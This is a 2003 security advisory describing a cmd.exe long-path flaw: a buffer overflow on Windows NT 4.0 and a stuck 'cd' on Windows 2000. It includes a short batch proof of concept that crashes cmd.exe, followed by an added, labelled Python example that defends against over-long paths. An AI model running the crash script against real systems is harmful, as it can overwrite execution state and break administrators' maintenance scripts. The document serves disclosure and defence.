SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 11 2003 - 02:15:13 PST


    Title:                  Buffer overflow/DoS against cmd.exe
                            for Windows NT 4.0/2000
    Affected:               Microsoft Windows NT 4.0 (buffer overflow)
                            Microsoft Windows 2000 (DoS)
    Vendor:                 Microsoft
    Risk:                   Average for Windows NT 4.0
                            Low for Windows 2000
    Exploitable:            Yes
    Remote:                 No
    Vendor Notified:        January, 30 2003
    
    I. Intro
    
    cmd.exe is the Windows NT OS family command processor. It is also used
    to process .bat and .cmd batch files. Many system administrators run
    batch files with elevated privileges for system maintenance.
    
    II. Vulnerability
    
    cmd.exe has a flaw in processing the cd command on a long path name. On
    Windows NT 4.0 it may cause a buffer overflow; on Windows 2000 it causes
    failure of batch file processing.
    
    III. Details
    
    The NTFS file system allows paths of almost unlimited length, but the
    Windows API does not allow paths longer than 256 bytes. To prevent the
    Windows API from checking the requested path, the \\?\ prefix may be
    used for the filename. This is a documented feature of the Windows API.
    
    cmd.exe from Windows NT 4.0 has a trivial buffer overflow in the CD
    command if the destination path is longer than 256 characters. This
    vulnerability may be trivially exploited to execute code.
    
    cmd.exe from Windows 2000 has no buffer overflow, but after changing to
    a directory with a path slightly longer than 256 characters (for example
    260 characters) cmd.exe becomes "jailed" in this directory: the cd ..
    command will fail. This may cause a DoS against a maintenance batch
    script.
    
    IV. Exploitation
    
    @echo off
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%B%\
    c:
    cd \
    cd AAAAAAAAAAAA*
    cd AAAAAAAAAAAA*
    cd BBBBBBBBBBBB*
    cd ..
    
    creates a directory with 2 subdirectories. The first one demonstrates
    the buffer overflow on Windows NT 4.0 (the second cd AAAAAAAAA* command
    will crash cmd.exe with EIP overwritten); the second one demonstrates
    cmd.exe changing directory to AA...\BB..., after which the cd ..
    command will fail.
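    The failure mode in sections III and IV is a maintenance script whose
    cd silently fails, leaving the rest of the script running in the wrong
    directory. The following is an added defensive example, not code from
    the advisory or from Microsoft: it audits a list of paths against the
    classic Windows API limit (the documented MAX_PATH constant is 260
    characters including the terminating NUL, while the advisory quotes
    256), treating \\?\ paths as over-long when the part after the prefix
    exceeds the limit, and wraps chdir so that an over-long target is
    refused and a cd that did not take effect raises instead of passing
    silently. The JailedShell class and the SAMPLE_PATHS list are
    constructed stand-ins for the Windows 2000 behaviour described above;
    the chdir/getcwd parameters of safe_chdir are this example's own design
    so the logic can run without touching a real filesystem.

```python
"""Path-length guard for Windows maintenance scripts (added example, Python 3)."""
import os
import ntpath

# Windows API MAX_PATH: 260 characters including the terminating NUL, so the
# longest plain (non-\\?\) path the classic API accepts is 259 characters.
MAX_PATH = 260
EXTENDED_PREFIX = "\\\\?\\"  # the \\?\ prefix that bypasses the API length check


def strip_extended_prefix(path: str) -> str:
    """Return the path without a leading \\?\ (the part the API would check)."""
    return path[len(EXTENDED_PREFIX):] if path.startswith(EXTENDED_PREFIX) else path


def exceeds_max_path(path: str, limit: int = MAX_PATH) -> bool:
    """True when the path plus its terminating NUL would not fit a MAX_PATH buffer."""
    return len(strip_extended_prefix(path)) + 1 > limit


def audit_paths(paths, limit: int = MAX_PATH):
    """Return (path, length) for every entry a legacy tool such as an old
    cmd.exe cannot be trusted to handle; \\?\ paths are measured past the prefix."""
    return [(p, len(strip_extended_prefix(p))) for p in paths if exceeds_max_path(p, limit)]


def safe_chdir(target: str, *, chdir=os.chdir, getcwd=os.getcwd, limit: int = MAX_PATH):
    """cd that refuses over-long targets and verifies the move actually happened.

    A batch 'cd' that fails silently leaves the rest of the script running in
    the wrong directory; this raises instead. chdir/getcwd are injectable
    (assumed design of this example) so the logic can be exercised offline.
    """
    before = getcwd()
    expected = ntpath.normpath(target if ntpath.isabs(target) else ntpath.join(before, target))
    if exceeds_max_path(expected, limit):
        raise ValueError(f"refusing cd: {len(expected)} chars exceeds limit {limit}")
    chdir(target)
    after = getcwd()
    if ntpath.normcase(ntpath.normpath(after)) != ntpath.normcase(expected):
        raise RuntimeError(f"cd {target!r} did not take effect: still in {after!r}")
    return after


class JailedShell:
    """Constructed simulation of the Windows 2000 behaviour the advisory
    describes: once the working directory is longer than the limit,
    'cd ..' silently does nothing."""

    def __init__(self, cwd: str, limit: int = MAX_PATH):
        self.cwd, self.limit = cwd, limit

    def getcwd(self) -> str:
        return self.cwd

    def chdir(self, target: str) -> None:
        if target == ".." and len(self.cwd) >= self.limit:
            return  # the silent failure ("jail") described in section III
        self.cwd = ntpath.normpath(
            target if ntpath.isabs(target) else ntpath.join(self.cwd, target))


# Constructed sample input: one normal path, one at the limit, two beyond it.
DEEP = "C:\\" + "A" * 200 + "\\" + "B" * 60          # 264 characters
SAMPLE_PATHS = [
    "C:\\Windows\\System32",
    "C:\\" + "A" * 256,                              # 259 chars: fits
    "C:\\" + "A" * 257,                              # 260 chars: does not fit
    EXTENDED_PREFIX + DEEP,                          # 264 chars after the prefix
]


def demo() -> dict:
    """Run the audit and both guarded cd scenarios; results keyed by scenario."""
    results = {"audit": [length for _, length in audit_paths(SAMPLE_PATHS)]}
    root = JailedShell("C:\\")
    try:  # entering the over-long directory is refused up front
        safe_chdir(DEEP, chdir=root.chdir, getcwd=root.getcwd)
        results["cd_into_long"] = "allowed"
    except ValueError:
        results["cd_into_long"] = "refused"
    jailed = JailedShell(DEEP)
    try:  # 'cd ..' from inside the jail is detected rather than ignored
        safe_chdir("..", chdir=jailed.chdir, getcwd=jailed.getcwd)
        results["cd_up_from_jail"] = "moved"
    except RuntimeError:
        results["cd_up_from_jail"] = "detected"
    normal = JailedShell("C:\\short\\dir")
    results["cd_up_short"] = safe_chdir("..", chdir=normal.chdir, getcwd=normal.getcwd)
    return results


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario}: {outcome}")
```

    In a real script the injected JailedShell is dropped and safe_chdir uses
    os.chdir/os.getcwd; the point is that both failure modes (an over-long
    target, and a cd that returns without changing directory) become hard
    errors the script cannot run past.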
    
    V. Vendor
    
    Microsoft acknowledged the problem.
    
    -- 
    http://www.security.nnov.ru
             /\_/\
            { , . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  ZARAZA  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)
    